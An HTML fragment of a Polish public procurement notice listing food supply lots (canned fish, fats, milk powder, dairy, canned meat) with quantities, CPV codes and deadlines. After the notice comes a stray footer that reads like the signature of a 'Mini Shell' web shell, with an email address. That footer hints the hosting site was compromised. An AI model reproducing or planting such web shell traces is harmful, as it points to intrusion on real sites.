<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część III (konserwy rybne) 

1.Szprot w sosie pomidorowym  z samootwieraczem - 1500 kg
2.Sałatka rybna typu Neptun lub równoważne z samootwieraczem - 2000 kg
3.Paprykarz szczeciński  z samootwieraczem - 1400 kg
4.Śledź w sosie pomidorowym  z samootwieraczem - 1400 kg
(dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część IV (Tłuszcze) 
1.Tłuszcz roślinny (typu Margaryna) do smarowania pieczywa zawartość tłuszczu min 20% w kostkach od 200g do 500g - 17000 kg
2.Tłuszcz roślinny do smarowania  ( typu Masło roślinne lub równoważne ) o zawartości tłuszczu 
od 60%  - 80% w kostkach od 150g do 300g - 1700 kg 
3.Olej  roślinny - 1400 L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mleko granulowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część V 
Mleko odtłuszczone granulowane ( minimalna zawartość białka 34%, bez domieszki oleju roślinnego ), ( worki nie przekraczające 15 kg ) - 2000kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.17.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część VI (Nabiał)
 
1.Ser twaróg półtłusty ( w kostkach o wadze 0,2-1kg ) - 6000 kg
2.Serek fromage naturalny ( w opakowaniu 100 gram)  - 500 kg
3.Serek granulowany czysty (w opak.100g -200g) - 500 kg
4.Śmietana 12% - 2400 L
5.Ser topiony czysty ( opak.100gram ) o zawartości tłuszczu nie mniej niż 27% - 1200 kg
6.Kefir - 2000 kg ( opakowania 5-10 kg )
7.Jogurt owocowy 100- 150 gr - 3000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.54.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Konserwy mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część VII (Konserwy mięsne) 
1.Pasztet drobiowy czysty ( bez dodatków) w  alupack *- 1500 kg
2.Konserwy mięsne ok. 300g (plus minus 10g) z samootwieraczem **- 2000 kg
3.Konserwy wieprzowa mielona sterylizowana -w alupack * - 920 kg
4.Szynka mielona drobiowa sterylizowana -w alupack * -  800 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com